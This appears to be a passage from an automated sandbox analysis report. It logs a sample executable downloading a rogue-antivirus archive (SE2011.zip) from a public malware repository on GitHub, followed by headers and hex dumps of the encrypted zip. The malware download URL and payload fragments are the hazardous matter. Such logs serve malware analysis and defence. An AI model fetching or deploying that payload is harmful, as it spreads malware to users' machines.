                                                                                                                                                    2022-09-29 12:59:23 UTC32568OUTGET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    128185.199.108.133443192.168.2.349771C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:23 UTC32568INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 2265879
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "68ce3eb817247cbdbb38d4d0c5fd8556ae42a26c8fa1d29d892506084cacec7d"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0809:045E:1D0478:1EA7B3:63359364
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:23 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6973-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456363.360161,VS0,VE169
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: c948a08fabc49798bd2cff05eedba947b5b13767
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:23 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:23 UTC32569INData Raw: 50 4b 03 04 33 00 01 00 63 00 66 ab 98 43 00 00 00 00 51 92 22 00 00 76 26 00 15 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 45 32 30 31 31 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 2f 34 9b fa 53 72 7f f2 f8 28 ea ed e3 98 44 e9 3e 6e 80 5c d8 f8 81 cc 55 93 6d 4a ed 13 7c 3f c6 ea ed 1d 23 c4 cc c5 59 61 c9 93 9b 12 c2 35 1a 29 ef 86 ea a8 23 3c 8f 24 e8 49 51 59 0d a0 55 6e 83 ee 2a f4 20 43 2e 76 ca 10 21 46 9e 5e c0 8f 4b fb a0 b4 56 79 2a ee 69 3f 22 60 14 f9 e3 80 b0 b4 96 3e 89 c0 8d 99 55 cc db e8 98 23 fc 62 f3 5a e5 9e 76 1e 7f b1 b0 a6 25 c9 a1 98 36 fc 01 9c 82 e9 9c 37 a6 e6 26 99 9f 26 8c 4a e9 be 31 b5 3e 6c b3 31 e7 73 5d da 4b ac 18 9d cf 11 8f cc 7e f2 a0 39 84 32 8d 4c 15 e9 9c d7 e1 a7 4e a5 ed 94 5f 06 5f 11 5e ad 80 08 33 09 bf
                                                                                                                                                    Data Ascii: PK3cfCQ"v&Endermanch@SE2011.exeAE/4Sr(D>n\UmJ|?#Ya5)#<$IQYUn* C.v!F^KVy*i?"`>U#bZv%67&&J1>l1s]K~92LN__^3
                                                                                                                                                    2022-09-29 12:59:23 UTC32570INData Raw: be c0 d1 8a 4e 56 db be f1 10 4b 46 1c eb c5 55 b0 91 0e 2e 2c 95 84 f8 cf 4c f5 a7 a8 b2 5e cb 7b ad 79 bf 63 9b d3 a7 49 7f e1 26 ff 05 a5 8d 77 22 fc b5 e2 1d 6c 4f 2b dd 60 27 d4 1c c1 8d bf e4 b9 96 67 c9 7f 8d e7 6e 55 e4 14 d5 f3 0d 84 0b 39 c5 e1 64 10 e8 14 f1 ab de a7 b9 4f 8e 8f 84 53 43 4f e3 cf 67 84 84 36 3b 65 78 65 1e 32 5a de d8 4d f2 f6 07 86 7d 8f 0e 82 1a 61 32 85 b1 b4 d5 23 0c 47 00 72 99 65 5d 7a 5f 8f 6a d1 54 e4 53 ab 2a 21 ef c3 58 fc 69 0c 29 3c a2 11 63 0c 69 05 c1 10 b9 6d 13 4d 00 ae 6b 26 bb f1 f8 47 d5 d5 cc 1f e4 84 ca 7e 9a 7b fc d5 3b e0 17 50 ce 6a ee f3 78 91 f0 73 1d e2 af 73 3a 07 fe 71 6e 40 93 56 b4 76 05 42 b2 ac 7f 85 c2 ea c9 24 2a 92 0a 22 de cc 8c f8 2d 48 85 3a dc d9 7a 68 86 00 df 18 0b d2 00 a2 c8 28 2d 30
                                                                                                                                                    Data Ascii: NVKFU.,L^{ycI&w"lO+`'gnU9dOSCOg6;exe2ZM}a2#Gre]z_jTS*!Xi)<cimMk&G~{;Pjxss:qn@VvB$*"-H:zh(-0
                                                                                                                                                    2022-09-29 12:59:23 UTC32572INData Raw: 59 51 12 34 7e 52 d6 4b 69 67 a2 50 61 90 93 8d 2b ce 30 e7 d2 ee 6f 7c e3 b9 8b 01 64 63 a2 62 80 ce 44 43 c3 2e 9e 14 4f 13 d5 a8 cb b8 fe cc cf b7 b4 97 f1 a3 88 b2 65 7e 60 6f f8 a3 76 7e 2a f5 9f 5f ac 3a 62 ee bb 56 5c f4 66 73 57 37 74 a0 4a 78 b5 d8 d6 6a 9c e7 42 c3 d9 6c 0f 52 b7 d7 2a dd 0a c8 50 ee 38 6b 97 14 8a 38 7d 8e 3a 65 e6 ad 41 b3 94 55 c4 11 7a 43 76 2e 88 ad 87 0b c3 d8 e0 af 67 70 7d 3a 1d e6 86 de 99 90 19 b9 61 5e 9d 3d ee 13 e0 e2 11 d3 31 80 e9 12 7e 40 64 27 4b 73 f3 22 0b 8a fb d3 06 63 e2 a0 70 d0 7d 35 b0 d6 8c d5 9e fa c2 86 4d ed 5c c6 ce 41 63 fb cb 1e 46 87 13 9a c2 c4 3a 36 a9 31 55 1a e1 1f da 0f 3e 1d c9 86 d8 8d ad a7 b9 ac 33 1d fe 28 26 c5 0f ca 8a 06 f4 91 46 1d ac 91 3b 99 fb 96 c6 0f a5 94 8f e3 d4 50 79 c9 b1
                                                                                                                                                    Data Ascii: YQ4~RKigPa+0o|dcbDC.Oe~`ov~*_:bV\fsW7tJxjBlR*P8k8}:eAUzCv.gp}:a^=1~@d'Ks"cp}5M\AcF:61U>3(&F;Py
                                                                                                                                                    2022-09-29 12:59:23 UTC32573INData Raw: c1 0b ab 79 92 9a 96 9f 68 47 79 2d 0d 88 1a 75 f0 d1 5f e3 ba 94 4f 6b 1a 71 b9 ae 6f b8 6e f1 9f 5f bf 6b 39 a8 41 9d 94 45 43 2d 94 a6 09 8a 29 43 5b de 8d cf 9d 9c 30 15 ed 12 d4 79 df bb 58 d6 bf 8f 0b 8a 66 ff 63 a4 b8 a8 f7 2a 76 23 db e3 74 63 4d 24 5f 6e 11 51 b3 65 27 45 12 d3 a6 ab a8 75 03 4e d4 81 f2 7d 47 fd e0 b2 af 4f bc 81 71 1f 1d c2 7f 0b f0 18 c5 6c ea 61 ee c8 1b 63 11 c1 36 5c fd 8b e1 04 d2 3c 9b 62 1b 00 2d 1f 0a 45 c2 a0 3a e5 31 42 dc ef 78 bd 74 5f b6 9b 87 a2 05 4f 7a 25 6d 85 14 8f 00 cb e6 ec d9 19 20 76 65 0e d1 ee 5c 55 a7 14 23 4c d4 29 08 19 91 c1 27 72 df bd 40 a9 eb 56 aa 25 28 cc 19 2a 42 62 19 99 b7 83 35 83 8d 47 09 d3 40 eb 34 db 60 f3 8b 96 da c8 18 0a 38 10 7d 8c 16 97 af 2b 00 cc 1b dc 5d 65 39 76 23 69 12 e0 c4
                                                                                                                                                    Data Ascii: yhGy-u_Okqon_k9AEC-)C[0yXfc*v#tcM$_nQe'EuN}GOqlac6\<b-E:1Bxt_Oz%m ve\U#L)'r@V%(*Bb5G@4`8}+]e9v#i
                                                                                                                                                    2022-09-29 12:59:23 UTC32574INData Raw: 00 8b a5 95 b4 7a 4f cf bd d5 ff 93 24 95 97 e2 d3 75 8c 32 2c 2a e0 75 8d fc 7f f6 59 e8 3c 61 0c 6b bc b8 66 5f 13 83 bb 2d a0 3d 47 c8 91 c7 a9 f8 2c 49 99 3b b6 c3 da 6c ac 76 69 ca 9d e2 ff 9c 40 92 63 15 71 a4 a7 68 c8 80 84 10 2b 91 11 bd f8 30 11 cf d1 e5 96 6c 2c 06 5d 2a a6 f3 95 58 bf ef 85 f6 56 1d 34 45 4f 8f af 64 a4 e4 94 be 81 5f ac e1 52 20 72 94 03 80 aa e6 cd ee c3 fb b2 28 25 31 a5 50 d4 d6 f2 b2 42 ac 65 b1 cf be b4 ec e0 c1 bb 18 45 f0 b0 31 62 ec 42 f8 cf 44 88 3e f6 29 c6 11 3e 8f f6 a3 2e 66 d8 bc 54 33 f7 69 d9 2e ed 9b 23 79 39 30 3c 13 a9 28 d6 8a 5b e8 f6 25 b0 6e 81 a0 90 0f ff 7b 8d c2 61 88 64 aa df a3 a9 ce d6 19 21 95 76 19 9a 3d 34 72 7b d6 f3 e3 f2 9f be 3f c2 02 1d 43 5a f0 7d 87 1a 2b 53 99 7b db 25 96 ee 86 ad fb ad
                                                                                                                                                    Data Ascii: zO$u2,*uY<akf_-=G,I;lvi@cqh+0l,]*XV4EOd_R r(%1PBeE1bBD>)>.fT3i.#y90<([%n{ad!v=4r{?CZ}+S{%
                                                                                                                                                    2022-09-29 12:59:23 UTC32576INData Raw: f4 e5 b4 91 d8 44 68 05 c7 46 54 cf bf d0 86 af b8 61 8a d6 1d 04 53 17 ea 4c 31 bb 76 92 d6 12 1a ea 97 19 fa 71 b7 cb 0a 44 73 ba 27 fb b3 f9 7a d5 2b 9a c3 45 b2 1c dd fd 88 c2 d3 d2 76 5a 4b f3 69 a0 0d c3 7e cc 5e fb 6c 80 da f8 85 bd 95 0a ac 4e 3b 05 4b bd a4 51 20 60 da 2f 0a 14 a9 84 37 d2 e6 ab da d0 8f 9a e9 4b 99 2f be fb 55 59 18 3a 57 2b 85 94 80 30 db 99 32 6c 2f 0d b4 e9 c2 62 a4 42 f3 03 f3 2c da 0b c2 00 41 51 b5 1a 9f dd 85 e3 a0 58 57 2d 60 01 c5 37 6b 28 9f 9f a7 b2 4c 0c 70 fa 87 59 b5 3b eb db ca 8a 9f 23 cd cd ff e2 a6 68 9f a2 1e 45 77 0a ff 95 f9 95 fc 4f 1f fd e0 ca 50 68 2c 0c 0d ed 7a 5c 51 ff 75 cd 38 0a b5 51 9a 8b ee 92 f8 5f 2f 65 47 7f 1d 7d 52 7e 66 76 2c 6a 55 0e 6f 7b 1f e9 fa 23 61 22 70 e2 5a 9d 92 ef 5c b6 a6 eb 37
                                                                                                                                                    Data Ascii: DhFTaSL1vqDs'z+EvZKi~^lN;KQ `/7K/UY:W+02l/bB,AQXW-`7k(LpY;#hEwOPh,z\Qu8Q_/eG}R~fv,jUo{#a"pZ\7
                                                                                                                                                    2022-09-29 12:59:23 UTC32577INData Raw: 63 06 9d e1 03 ca 5d ad 09 86 ec 51 e2 8f 7e 99 22 13 4d 86 d0 dc 06 fa 6f 81 51 bf 20 3f b5 9b cd 76 36 7a e2 d5 48 ff 0e 25 65 41 4c 69 62 62 72 d0 f4 82 10 11 17 f7 19 11 57 33 24 98 5f 98 85 3c c4 73 a0 21 9f 94 46 10 f5 8f 55 ac f1 7f 0b f3 59 72 51 e0 9f b7 e9 09 05 78 66 0c 38 e4 06 22 9f 5f 06 b9 ff 1a 1a 5a 21 00 2d 7c ec 25 62 2c f5 d5 c7 37 40 77 ba f0 cf f2 4b f2 53 3d 53 c7 a4 77 5a 3f 6b 6b 23 5f 16 f5 39 5c f6 75 22 ff bf e6 f6 e8 a9 4c 86 85 f0 53 5f 59 73 53 33 49 25 9c a0 59 ad e4 6d d5 cc 8d d5 24 14 7b ea 2b f9 6d 59 ea f7 1e c0 08 22 81 ed 09 a5 f3 13 4e c6 ff 74 d2 30 75 2d d7 bc 3e 9e 41 6d dc 15 66 a3 c8 c8 17 6e d9 ce 2a 61 d5 fd 51 50 23 96 be 86 a0 d6 f3 1d fb 58 e0 1a 82 9b 37 a3 31 92 bc df 71 8d 30 d6 ad cd 62 41 60 ea 05 27
                                                                                                                                                    Data Ascii: c]Q~"MoQ ?v6zH%eALibbrW3$_<s!FUYrQxf8"_Z!-|%b,7@wKS=SwZ?kk#_9\u"LS_YsS3I%Ym${+mY"Nt0u->Amfn*aQP#X71q0bA`'
                                                                                                                                                    2022-09-29 12:59:23 UTC32579INData Raw: 3b 2f 1a 90 ea 19 4a 80 11 34 c7 78 7a cd 15 ca ec 19 8c 6c 55 e9 02 cd 4f 0d e7 24 14 87 5e 0d b3 b6 4d e6 5d 23 36 6e 43 2e db 5c fd 9e d4 bb e7 25 aa b7 c3 ef 58 51 84 79 b8 5b 9f a2 eb 9e 88 02 92 22 e8 a1 fc c5 98 7e a6 4d dd d3 f0 bd 62 cd 92 5a bd 94 17 ca b8 cd a9 e5 8b b9 54 ee 04 b4 27 b4 9b 58 94 e7 c2 68 bf 21 4c 24 30 8d 95 e7 ed f8 6d 65 3e e8 78 5a 5c ad 56 60 5e 3c d6 90 01 21 95 e5 aa 71 df 20 6c 69 a6 ed 14 16 d4 c4 a5 29 8f 2d 3f 8e 5a 4a 92 cd 1a 05 40 f9 1d 7c 94 f9 d1 17 87 d8 5f 41 cb 20 13 8e 60 d5 e8 d7 ee ea cb 24 2b 1c ac 6b ff 06 c7 1b 72 c4 c7 17 cc b2 ad bd 3b 1d c3 4d d1 6d f7 9f 1f e7 fc ca 15 23 44 0c b0 d5 d6 49 f7 c5 2c 61 93 62 0c c4 22 d8 a9 1c f8 e0 ab b1 c5 a3 88 51 f5 fa aa dd e8 fd 17 d4 27 7c 4b 41 73 f0 09 af 9e
                                                                                                                                                    Data Ascii: ;/J4xzlUO$^M]#6nC.\%XQy["~MbZT'Xh!L$0me>xZ\V`^<!q li)-?ZJ@|_A `$+kr;Mm#DI,ab"Q'|KAs
                                                                                                                                                    2022-09-29 12:59:23 UTC32580INData Raw: 30 3f 08 ec 8f 58 bf f2 4c 6d dd bd 56 a5 5e b8 6b 48 4d dc 8b 8f 23 01 df 9e 49 5f c0 70 ab b7 e2 fa 77 ee 6d 25 bf 23 b0 bc ca 2d 96 89 f2 92 f5 d7 31 22 2c 4b ca 9a 1b 7e ad 8e 51 5f fc e9 a7 c7 3b 02 6a 4b 63 80 f3 a9 ee 50 dd 8a b4 9e 8d be 43 d4 89 70 16 a4 a3 5e f3 5a 29 d9 5e cb 29 89 e8 1a 8e 9c 44 4e 2d 47 4d c7 37 50 f6 c7 07 4d 6d 88 c1 90 f6 02 fc c0 5f 25 db bf c9 e2 cd 2b e4 33 cb 61 11 50 22 72 59 ad e8 69 c8 5e b6 98 4b 60 40 88 57 49 68 33 8d 33 15 ce c5 ea 15 3b 95 2b f1 87 6e ac 6e 40 12 96 53 02 85 98 4c 91 3c 30 03 bf 0d be a9 e3 02 e8 8d 14 67 14 4c 64 70 27 09 32 12 95 eb 8e 73 e0 9a b1 3c 77 8f 4a 95 08 5c fd 8c 0e dc d2 0c f4 43 08 d6 64 85 69 47 80 f0 fc 03 64 d5 d3 2e ca 54 b6 cb e8 1a cd 31 f8 de cd c7 de ad 57 8e 72 cd 4b c3
                                                                                                                                                    Data Ascii: 0?XLmV^kHM#I_pwm%#-1",K~Q_;jKcPCp^Z)^)DN-GM7PMm_%+3aP"rYi^K`@WIh33;+nn@SL<0gLdp'2s<wJ\CdiGd.T1WrK
                                                                                                                                                    2022-09-29 12:59:23 UTC32581INData Raw: 97 c5 1c fa 1d e7 c1 90 79 93 83 dc 5a df 0c 2b 33 15 da 8c c5 dd bc da 7a bd 59 b0 48 2d fb 48 f3 5d 44 84 a2 a0 f5 a4 9b 13 2f 99 5c 5f 70 fc ca 87 e6 72 0b 18 20 aa 3a 67 46 28 c2 be 6c eb 4a 15 cc ff 33 6c 5e 10 99 14 a9 d3 37 58 df 79 12 f0 10 c7 e1 5e a5 bc 2c 64 99 66 d3 26 d4 fd cc 11 bc ae 58 01 ba ee 84 cf 68 67 5f 02 14 e5 b6 c6 93 79 60 7f 67 c7 e7 a8 66 fc d1 ae 46 a7 9d ed 8f a7 6b a6 e0 88 ee a2 a5 7c 56 b6 ba d2 ac db bb 49 ee 2f a0 f2 6a 8d 81 94 e3 ca 2c 98 c5 15 15 cd 73 42 5e 81 88 c5 eb 80 ec 2d 1b 18 49 20 20 23 54 97 43 4e 14 8d b4 87 82 e0 23 a3 66 32 b1 49 7a f1 3e 0e 0e c2 67 70 4a 44 b0 06 6b e0 2a f9 26 96 c3 85 64 c6 2f 67 91 3b 98 47 d1 ca 35 ed 02 21 57 1d 1c c7 16 5f cb 3b 0e 41 93 c2 50 6f 12 ae c9 e8 70 af fc 7c a0 45 a8
                                                                                                                                                    Data Ascii: yZ+3zYH-H]D/\_pr :gF(lJ3l^7Xy^,df&Xhg_y`gfFk|VI/j,sB^-I #TCN#f2Iz>gpJDk*&d/g;G5!W_;APop|E
                                                                                                                                                    2022-09-29 12:59:23 UTC32583INData Raw: b8 01 0c c6 15 b3 ac 8e c7 6b 3c f9 96 8c 62 47 14 c5 d1 ef 47 b6 21 25 ec 49 f4 ff 7c 72 e6 98 be 2d 86 ac dd 59 78 73 4a 06 54 69 3b 40 43 58 a7 bb 53 22 25 d9 af 73 5e 66 4b b8 98 e6 6a e7 53 ea bf e3 54 51 01 90 72 fd 00 42 53 7f 97 63 bb f5 b9 0a 10 a7 b2 b7 26 39 60 c0 c7 ba 0d 97 cf 03 82 a1 ef 6d 74 5c 6c d2 63 1a bc 73 ca 93 29 8f 51 d4 f7 58 6c ea bb 30 4b d2 e6 d4 42 6d 18 20 e6 e3 81 54 7f 3a 68 59 a1 05 29 40 04 61 d4 30 45 29 03 9e 6e de fb 50 98 52 b5 7c 81 5a 8b 85 9f a6 1e 22 54 74 0e 1b 0d bb d5 34 f4 7d 65 ee e3 0e e0 48 72 de d2 00 68 d1 cc b7 0a 25 d1 7e 17 ab 54 cb 7e 7b b8 2c 90 1b a6 9e 96 a7 57 9f 03 de fa 97 d7 77 7c 91 f5 7c 87 a1 c6 6b 15 c6 b5 f0 58 5c dc 29 f9 ef 86 5f 70 84 07 09 4d 58 bf 28 f9 12 5a 05 6a 87 4d a6 23 11 95
                                                                                                                                                    Data Ascii: k<bGG!%I|r-YxsJTi;@CXS"%s^fKjSTQrBSc&9`mt\lcs)QXl0KBm T:hY)@a0E)nPR|Z"Tt4}eHrh%~T~{,Ww||kX\)_pMX(ZjM#
                                                                                                                                                    2022-09-29 12:59:23 UTC32584INData Raw: 03 bd 48 d3 e7 90 39 25 69 83 7c 59 4d d5 62 2d 8a f4 63 42 3d f3 ed eb ed 56 ef ec ee cb b3 c0 6b 6d 29 92 ff 28 4c 60 77 0e 7c 73 f1 bb d6 9d 9b ed ba 14 35 74 68 03 cd 6e 8a d3 52 db 17 b2 ec 8d b9 2b 4f 81 cc 29 0b 11 04 11 da 2b dc 6a 6b 4f e0 5f c6 81 55 38 7e d7 06 af 09 d4 82 7e fa 7f 90 b5 cb 40 ce 60 f2 28 eb 5f c1 57 28 8d 13 80 5e 53 1b fb 8f 26 67 a7 d1 f9 06 31 85 a9 18 a4 9a 65 fd 8b f7 ad 24 d4 50 b8 4b 29 a5 41 e0 8d 51 cb 9e c1 38 c1 b8 ad a8 4e 72 96 42 72 68 9e 95 f8 32 07 f1 fd 4e ef de a4 c6 82 9b ab f8 dd e1 0a 9e 2c fa 3d eb 0f e2 f0 ef 9a 87 84 ee 47 ee 14 b2 29 3b 5f f1 4d d8 15 7b be 49 71 11 cf 32 46 60 11 1c 66 cb da bd a1 2d 82 52 e5 e0 54 fa ee 97 67 d7 be 9f 73 c0 43 0a 06 f2 0f 32 47 38 4b d9 06 28 73 e6 58 b5 38 49 f5 2f
                                                                                                                                                    Data Ascii: H9%i|YMb-cB=Vkm)(L`w|s5thnR+O)+jkO_U8~~@`(_W(^S&g1e$PK)AQ8NrBrh2N,=G);_M{Iq2F`f-RTgsC2G8K(sX8I/
                                                                                                                                                    2022-09-29 12:59:23 UTC32584INData Raw: a7 b4 cd 22 51 80 e9 cb 97 ad 97 25 6c 36 c7 82 c9 ab 2c 1d 9d 9e d1 98 f1 10 5a 4a ea e2 b7 05 56 96 55 e3 98 8d f9 ef 23 84 e1 98 61 8b e3 5a e5 c4 ef dc 66 53 ae 4b 2c 9b ae 9f 9f 7b d3 e3 74 d6 51 52 d7 2c c8 e4 42 10 11 98 d0 6c 09 75 1c 7c a1 51 1b ff 11 04 0c ed 7d 4f d6 04 6a 02 0a 39 52 15 66 b7 0a bd 47 97 d8 14 ea fd 3c 84 f3 75 ea f8 a0 5e ae 6f c9 21 9d 31 74 12 dd 47 bb 7e b0 18 93 9d d9 86 3a 11 06 94 ab 79 54 06 f8 bf 62 65 46 bc 7c a0 71 a8 0c d8 1c b8 76 f0 05 92 72 4a ab 46 40 fe b3 d7 fb f7 80 5e 76 cf 37 3e d6 74 64 d8 09 07 b8 84 f0 4f b9 c6 d7 2f 01 58 75 9d 8b c9 33 e3 06 63 ff c4 32 02 bf 6c ca 3f e1 6b c5 83 da 10 1b 4d d8 81 fd dd fd a3 1a 65 19 d8 0e f3 c2 9c 4f 0a d2 6a 0d 92 95 19 85 7e 12 22 6f 19 c1 6b 24 c0 47 42 c6 0d 19
                                                                                                                                                    Data Ascii: "Q%l6,ZJVU#aZfSK,{tQR,Blu|Q}Oj9RfG<u^o!1tG~:yTbeF|qvrJF@^v7>tdO/Xu3c2l?kMeOj~"ok$GB
                                                                                                                                                    2022-09-29 12:59:23 UTC32600INData Raw: e5 8b 4d 57 03 82 c1 73 3b 3a 0b 5b be 37 3f 12 8a 8a 19 1d aa 5a 01 9f 90 13 f0 8a 0a 58 1f 37 81 a1 10 88 4a c3 59 f9 8b ee 44 64 b1 38 0a e3 15 6e 99 04 d2 33 68 00 68 9a 2a 56 20 09 c7 ec c1 45 b7 c7 ec bd ee 98 b3 63 57 77 7e be 1e 5d ee 7b c3 93 d4 c7 83 20 94 cb 3a 6d 1d 87 25 0c db 15 10 5c 77 d5 9b 59 16 3d 87 98 2e 8b b2 84 63 79 be a4 d7 ff 36 f2 d3 40 fb df c6 3c d0 a5 20 af 0a dc 24 53 4f 7a 60 d5 56 d7 d0 98 3c 74 13 b4 ff c8 95 81 bb 23 cc f1 78 ff 86 6c 9a 8b f0 74 33 8a 1f f9 ae ea 82 26 4c 12 7b 7b 17 8c 57 96 6d 43 33 c2 e7 eb 4b d9 97 b3 b8 d5 9e 7e 4a d9 aa 3a 85 a3 46 39 16 26 05 e5 f3 44 7b fa c8 65 b9 ef b1 7d 81 d9 a0 49 78 54 9d dd ac 29 c9 9e 14 b8 59 95 93 94 1d 5e 11 a5 94 34 59 4a 6a c7 33 f6 0e b9 f6 76 2c ce b2 be df eb fd
                                                                                                                                                    Data Ascii: MWs;:[7?ZX7JYDd8n3hh*V EcWw~]{ :m%\wY=.cy6@< $SOz`V<t#xlt3&L{{WmC3K~J:F9&D{e}IxT)Y^4YJj3v,
                                                                                                                                                    2022-09-29 12:59:23 UTC32616INData Raw: 17 6f 2d 00 70 03 33 81 8b 71 7d df ca 2e 5a 8d 08 d8 4b 16 7a 72 e5 6f 1e 6f eb f2 a9 2b 10 e8 24 77 65 b2 0e ae 5f 99 bf 36 26 01 80 d6 a2 8a 19 8d 42 1b 58 f1 ac 0c 35 30 de 01 90 ce b4 92 32 7a 8c 19 3c 61 2f 40 d1 9d 57 43 bd 2a 24 92 f4 36 52 28 d1 9d ae 74 a9 3c b5 f0 2f fc 1c cf de 43 7c 13 53 e0 af 4c 3c 23 ab d2 0e 94 66 60 c5 74 49 c4 c4 57 92 00 a7 42 95 d6 8f 0f 70 63 af 72 3c 6d 7e a5 8c c5 ca 23 63 d6 a8 c2 9f 68 b6 fe 5c 11 05 ed ae d0 02 49 2e 14 cd 1f 6b 0e 53 cd 4d 2b 58 b6 f9 62 0e 59 65 24 ff 9d d9 be da 5d 8f b9 97 df 70 c0 24 7c a4 84 34 41 e0 8f 3a 73 60 aa 1f 7e 9a e3 b6 78 a3 80 cc 89 26 bb 45 73 16 42 8d 55 af bd 4c 11 56 56 0f da 31 fb 09 20 b4 a2 d5 1f ef cc 23 34 3c 14 7a 6f 60 5c 37 ee 22 60 9a a8 6f b6 c3 09 09 ad 8d 4f a3
                                                                                                                                                    Data Ascii: o-p3q}.ZKzroo+$we_6&BX502z<a/@WC*$6R(t</C|SL<#f`tIWBpcr<m~#ch\I.kSM+XbYe$]p$|4A:s`~x&EsBULVV1 #4<zo`\7"`oO
                                                                                                                                                    2022-09-29 12:59:23 UTC32632INData Raw: ee 2a 60 09 30 0e a0 77 40 5a ec 0f a9 4b 05 f2 ce 8c 35 a0 11 72 a8 3f c7 5c a5 cd e8 4a 44 37 6c 55 10 4e 03 10 17 2e 6d db 47 fd d8 a5 0b 07 77 00 50 10 2e cd 23 cf 44 25 ea 84 ac 73 4b 2c c5 d6 84 e0 19 4d 00 79 ae af 3c 73 5e 1d bb ce 40 7b b8 6f cb b8 4a ef 2c 4c a4 f9 10 ad 3b 1e 23 17 9e a8 a2 0c f7 bc fc c5 06 79 05 71 44 6b 90 94 a9 3b 32 5d cb 3c e0 6d e3 4c 5d 30 62 52 bf 1d ee ba c1 8b bc e7 14 cd 3b 3e b2 ee 9c 09 34 3d 0f 20 c6 9f 04 dd 3b f9 5c a0 c7 d4 cc 79 cb 30 e7 63 7d 88 8b d4 61 98 2b f1 2a 54 80 d9 0a 68 bd 40 f9 77 d1 81 51 58 7a 03 91 1a 80 b8 91 1c 57 a5 75 36 94 05 55 ba 85 c2 f2 51 4f fa 81 ce 67 9c 9e b7 20 99 7c 82 ca d8 48 3b 56 cb 2e 3c ec 8a 2d a6 f6 28 dc 70 8a 9b a5 53 0a 46 53 7a 65 6f d8 6d c2 26 1b 21 da 1d e4 48 05
                                                                                                                                                    Data Ascii: *`0w@ZK5r?\JD7lUN.mGwP.#D%sK,My<s^@{oJ,L;#yqDk;2]<mL]0bR;>4= ;\y0c}a+*Th@wQXzWu6UQOg |H;V.<-(pSFSzeom&!H
                                                                                                                                                    2022-09-29 12:59:23 UTC32648INData Raw: 72 5a 1b 6b 68 fa 1c 08 3b cc 21 ce f2 54 81 ea 22 45 e4 37 94 63 b1 d5 0e 19 81 3d 87 d4 08 4d e7 b4 cc 6f 1d 6b 2c 09 3e 5a 93 ab e8 be d9 36 1d ac 43 12 56 68 ed b8 11 9e ed 60 fb 81 76 1f 4d b3 d0 ad c8 a6 58 8b d6 ef dd c0 f1 9e 5e 7b 1b 20 4f 1f c9 c7 37 f4 93 2e f0 3f cf 35 7b 62 5d 19 db a0 3d 9f bf d3 ae 4d 02 4b 89 23 fd ce f7 0d d0 86 11 6e ac a6 12 32 c6 5a af 98 63 9f 01 d4 35 fd bb 1f 3e a0 44 3b ff 28 8e 52 e2 79 78 c4 ee e8 99 61 84 24 cb 54 a7 b8 13 94 59 b5 bc 1f a1 d1 c1 a3 b9 11 b5 98 97 53 4a aa 8a 6b b8 a0 72 ae c5 d7 ad 9b d3 79 05 e0 95 0d 33 7f 70 0d 7b a9 42 06 d5 cc 68 d6 b0 ef 63 28 87 48 a5 0c c0 a2 9f 57 ef ab 54 c7 c6 f9 93 c3 bf 0e 79 7b 23 75 35 5c 3d fb 5c 1d c0 fd 7a a6 9e 78 6c c5 96 e6 2e 13 9f a8 8e d4 4b 6d 0d 60 12
                                                                                                                                                    Data Ascii: rZkh;!T"E7c=Mok,>Z6CVh`vMX^{ O7.?5{b]=MK#n2Zc5>D;(Ryxa$TYSJkry3p{Bhc(HWTy{#u5\=\zxl.Km`
                                                                                                                                                    2022-09-29 12:59:23 UTC32664INData Raw: 22 ba b6 ca 50 7a 68 ba 93 64 01 5c 88 90 55 75 5c c4 64 35 39 2d 18 22 1b 70 e3 75 71 74 79 e7 53 de 3f 1f a0 3f f7 81 bb 99 61 83 33 8c 36 8d 42 99 c0 5e 8f 9d 11 8a ef 1d b9 35 4e af 32 3b e8 45 c9 18 7d 1e 42 f3 fd ff f2 da 3f 90 6a 0a 4c d4 01 c3 5e d0 7f 6d b9 85 14 16 5e b2 4d 80 31 09 68 5b 38 1f f8 c0 a6 89 14 59 69 4e ee 91 99 ba eb 34 e6 fe fa cd fe 2a cb 86 45 30 c1 51 66 1b a2 4f c3 d4 48 ea ba 3f 45 2b 6c 84 46 a1 95 68 d9 3c 1f 95 84 6c 43 1b d4 31 10 c1 6f 7f 40 7a a4 2b c3 0d eb c2 6e cd 1b 93 aa 18 ce bc dd 4e d7 bc 81 ca 32 d2 8e aa e2 60 fd 49 52 02 33 22 f3 4d 35 3a d3 2a 25 6b 03 47 b0 3c fe 19 a3 5c 4b 30 e1 cd 75 24 ac c4 15 c3 9d 67 a4 aa 3e c0 89 1a c2 6e 29 d8 79 8b d8 30 f1 d5 90 f3 77 94 f3 f3 5f 82 81 1d 00 bc 40 24 9f f7 b4
                                                                                                                                                    Data Ascii: "Pzhd\Uu\d59-"puqtyS??a36B^5N2;E}B?jL^m^M1h[8YiN4*E0QfOH?E+lFh<lC1o@z+nN2`IR3"M5:*%kG<\K0u$g>n)y0w_@$
